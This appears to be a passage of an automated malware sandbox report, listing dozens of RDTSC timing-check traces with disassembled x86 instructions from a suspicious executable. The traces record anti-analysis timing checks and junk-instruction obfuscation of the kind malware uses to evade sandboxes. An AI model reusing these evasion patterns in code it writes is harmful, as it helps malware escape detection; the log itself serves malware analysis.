                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2B1C second address: 12A2B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D19B4h], ebx 0x00000011 push 00000000h 0x00000013 or cx, 1AA2h 0x00000018 call 00007FC2CCC4B419h 0x0000001d push edi 0x0000001e jmp 00007FC2CCC4B426h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2B66 second address: 12A2B70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2B70 second address: 12A2C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnl 00007FC2CCC4B41Ch 0x00000014 jo 00007FC2CCC4B418h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jnp 00007FC2CCC4B429h 0x00000025 jmp 00007FC2CCC4B423h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push ecx 0x0000002f jbe 00007FC2CCC4B418h 0x00000035 push esi 0x00000036 pop esi 0x00000037 pop ecx 0x00000038 pop eax 0x00000039 add ecx, 165EDA52h 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007FC2CCC4B418h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b or dword ptr [ebp+122D2591h], edi 0x00000061 push 00000000h 0x00000063 mov ecx, dword ptr [ebp+122D1A81h] 0x00000069 push 00000003h 0x0000006b mov ecx, dword ptr [ebp+122D3764h] 0x00000071 xor ecx, 0F0D61DAh 0x00000077 push B023AA16h 0x0000007c push eax 0x0000007d push edx 0x0000007e js 00007FC2CCC4B41Ch 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2C1B second address: 12A2C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2C1F second address: 12A2C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC2CCC4B416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2C29 second address: 12A2C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2D18 second address: 12A2D1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1F7D second address: 12C1F96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC2CCD28613h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2145 second address: 12C2149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2149 second address: 12C2162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2162 second address: 12C2166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2166 second address: 12C2170 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2CCD28606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2170 second address: 12C2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2176 second address: 12C217E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C217E second address: 12C2182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E19 second address: 12C2E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E33 second address: 12C2E43 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCC4B41Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E43 second address: 12C2E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E47 second address: 12C2E51 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2CCC4B416h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3106 second address: 12C3130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28618h 0x00000007 jp 00007FC2CCD28606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3130 second address: 12C3136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3136 second address: 12C313A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C313A second address: 12C3167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC2CCC4B41Fh 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jne 00007FC2CCC4B416h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C32D3 second address: 12C32D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C35B9 second address: 12C35C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007FC2CCC4B416h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C6609 second address: 12C6635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2CCD2860Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C6635 second address: 12C6639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7816 second address: 12C781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296776 second address: 129677C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129677C second address: 1296789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296789 second address: 129679C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2CCC4B416h 0x00000008 jnc 00007FC2CCC4B416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129679C second address: 12967A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC2CCD28606h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF0A9 second address: 12CF0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF0AD second address: 12CF0DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC2CCD28606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC2CCD28614h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FC2CCD2860Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1FCB second address: 12D1FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1FD1 second address: 12D2012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jne 00007FC2CCD2860Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC2CCD28615h 0x0000001d popad 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2012 second address: 12D2016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2016 second address: 12D2020 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D236D second address: 12D2371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2371 second address: 12D2384 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b js 00007FC2CCD28606h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2453 second address: 12D246B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC2CCC4B416h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FC2CCC4B416h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2547 second address: 12D255E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD2860Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FC2CCD28606h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D255E second address: 12D2569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2569 second address: 12D256F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D26E5 second address: 12D26EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2AC5 second address: 12D2ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2FA0 second address: 12D2FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D30D0 second address: 12D3117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FC2CCD28608h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC2CCD28618h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3117 second address: 12D311B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D311B second address: 12D3121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3121 second address: 12D3127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D4054 second address: 12D4074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FC2CCD28614h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D4074 second address: 12D4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D510B second address: 12D5186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD2860Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and si, 11EDh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FC2CCD28608h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1796h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC2CCD28608h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d pushad 0x0000004e mov edx, dword ptr [ebp+122D2380h] 0x00000054 mov dword ptr [ebp+1244F42Bh], edi 0x0000005a popad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jbe 00007FC2CCD2860Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5186 second address: 12D518A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BE0 second address: 12D5BEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BEE second address: 12D5BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BF2 second address: 12D5C0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7D18 second address: 12D7D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B427h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D3594h] 0x00000010 mov esi, 4B65C9A7h 0x00000015 push 00000000h 0x00000017 mov esi, 20A40677h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FC2CCC4B418h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov di, 6183h 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007FC2CCC4B416h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FC2CCC4B41Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D91FF second address: 12D9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9205 second address: 12D9209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D8FBB second address: 12D8FC5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9209 second address: 12D9292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FC2CCC4B418h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 clc 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FC2CCC4B418h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 push 00000000h 0x00000042 add dword ptr [ebp+12488BD3h], eax 0x00000048 jmp 00007FC2CCC4B426h 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 jmp 00007FC2CCC4B425h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9292 second address: 12D929B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA533 second address: 12DA538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFA51 second address: 12DFA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jns 00007FC2CCD2860Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFA69 second address: 12DFA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E09D1 second address: 12E09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E09D5 second address: 12E0A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FC2CCC4B421h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FC2CCC4B418h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b pushad 0x0000002c mov eax, dword ptr [ebp+122D3768h] 0x00000032 mov dword ptr [ebp+122D19FFh], esi 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, ebx 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007FC2CCC4B41Bh 0x00000044 pushad 0x00000045 jmp 00007FC2CCC4B41Dh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0B92 second address: 12E0BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC2CCD28618h 0x00000008 jo 00007FC2CCD28606h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 ja 00007FC2CCD2860Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0BC0 second address: 12E0C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D5502h] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+12488BD3h], ebx 0x00000019 add dword ptr [ebp+122D2EFCh], esi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov ebx, dword ptr [ebp+122D35A8h] 0x0000002c mov eax, dword ptr [ebp+122D0139h] 0x00000032 clc 0x00000033 push FFFFFFFFh 0x00000035 mov ebx, dword ptr [ebp+122D37B0h] 0x0000003b nop 0x0000003c jnp 00007FC2CCC4B42Ch 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3102 second address: 12E3125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC2CCD28618h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0C05 second address: 12E0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Eh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0C1E second address: 12E0C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64F2 second address: 12E64F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64F9 second address: 12E6585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FC2CCD28608h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call 00007FC2CCD28614h 0x00000029 pop ebx 0x0000002a jmp 00007FC2CCD28618h 0x0000002f push 00000000h 0x00000031 movsx edi, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FC2CCD28608h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D240Bh], ebx 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 jne 00007FC2CCD28608h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6585 second address: 12E6589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8606 second address: 12E860A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
